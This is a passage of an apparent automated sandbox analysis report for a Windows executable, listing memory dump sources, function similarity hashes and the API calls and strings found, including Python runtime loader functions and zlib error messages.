                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                • Instruction ID: 9728cc143d3356044112bd45254a15fcc8725c36bf252448fd463b32f3621fd5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D219621B2C68241FAA45761949537D26939F8CFACF28C2B9E96FC77F5EE6CE4414300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                • Instruction ID: a285b2c863029249d3c3b708c4081d048737345a7841394fcb7065cca7ac9d8c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC41E23291C24187EA348B19A44027A77A4EF5DF88F249175DA9FC36E1EF2DE402CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                • Opcode ID: 12c7421bf9d851de3930d973ff4776f23e58c204998b3b00b1158df84cf7151e
                                                                                                                                                                                                                • Instruction ID: de90cee15de34bfb5b83af53d0535a9c43f6fc3d2dec993c11de0e340486ce11
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12c7421bf9d851de3930d973ff4776f23e58c204998b3b00b1158df84cf7151e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8421B421B1865246FB149B2269047BA9641BF4EFCCFAC84B0EE0EC7796DE7DE851C204
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                • Instruction ID: ac2693c59966f5d2fb07de2ab10eb92b84f9efae255f1a4c8ba3276f58e0fa6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF319062A1C60285F751AB55884137D2A90AF88FA8F6181B5EA5FC73F2FFBCE4418711
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                • Instruction ID: f55203d0652f6ffc24c17a545db72fc08e1dd484ba9c29d5e2c40c0ccf708314
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21A172A0474589EB248F68C4802EC37A0FB48B5CF248676D75FC6AE9EFB8D544C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                • Instruction ID: 869402602c92ce21047ff13f0c927ea38131545fd0c9073769163ab8c4f1e21a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8117531A1C64182EA609F11940027DA665BF9DF8CF6484B1EF8ED7BB6EF3DD4005740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                • Instruction ID: 9196e01f606d361ec137923b66af36539b4dc58b453cea1e909d445c4b13d9f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4216272A18A8186DB618F18D44037976A0FB89B5CF3882B4E75EC76E9DF3DD911CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                • Instruction ID: f896f5760be44385bc05e3053ea87d966cbaebd9509bb33806e6730e59e5015a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F01E121B0874180EA44DF529905169A691BF8DFE8F68C6B0EE6ED3BE6EE3CD1018300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                • Instruction ID: 2e64bbd09dc55a1308d6cf64b82fbb0d422f6ad2fd6417651cddddc6f8e7bf7f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35018B60E1D68341FA506B2155405795698BF4CBDCF74C2F4EA6EC26EAFF2EA8408200
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                • Instruction ID: 117b65033377843a046ff01f478137044b9c779a441004d48789aebb6b320c82
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AFE08C50E1C60687FA113BA804C217810204F9DB48F74C0B0EE0BC63E3FD2C68449332
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF60B13B32A,?,?,?,00007FF60B134F11,?,?,?,?,00007FF60B13A48A), ref: 00007FF60B13EBED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                • Instruction ID: 5709bcd6966c936914359005c7f7cbc1c402992d24c306a335c10f8289a1f4e5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF01756B0930781FE5A5B6A98553B912945F8DF88F6CC5B0C90FC63FAFE2DE4858220
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF60B130C90,?,?,?,00007FF60B1322FA,?,?,?,?,?,00007FF60B133AE9), ref: 00007FF60B13D63A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                • Instruction ID: 8b8484f886145999ae37c0daceb4e54582067fe2a78f4bdb5e948203d8066697
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DF0F890F0924685FE655772684167912A55F8DFACF6887B0DD3FC62E2FE2CA4C08610
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B125840
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B125852
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B125889
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B12589B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B1258B4
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B1258C6
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B1258DF
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B1258F1
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B12590D
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B12591F
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B12593B
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B12594D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B125969
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B12597B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B125997
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B1259A9
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B1259C5
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B1264CF,?,00007FF60B12336E), ref: 00007FF60B1259D7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                • Instruction ID: 093e5b387a5d075490dad227037c2b95b253e21081ffb585a399896c9b06ab07
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4222D564A0EB07A1FA158B25B8945B533A1EF1D74EF75D0B5C81FC2274FF7CA8698240
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                • Instruction ID: 373baae17d8eb8917e538edeec2825fbda192260ce4b104e1a72bfd43dd9fc18
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72B2D272A182828BE7648F64D5407FD77A1FB5878CF649175DA0BD7B98DF38AA00CB40
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
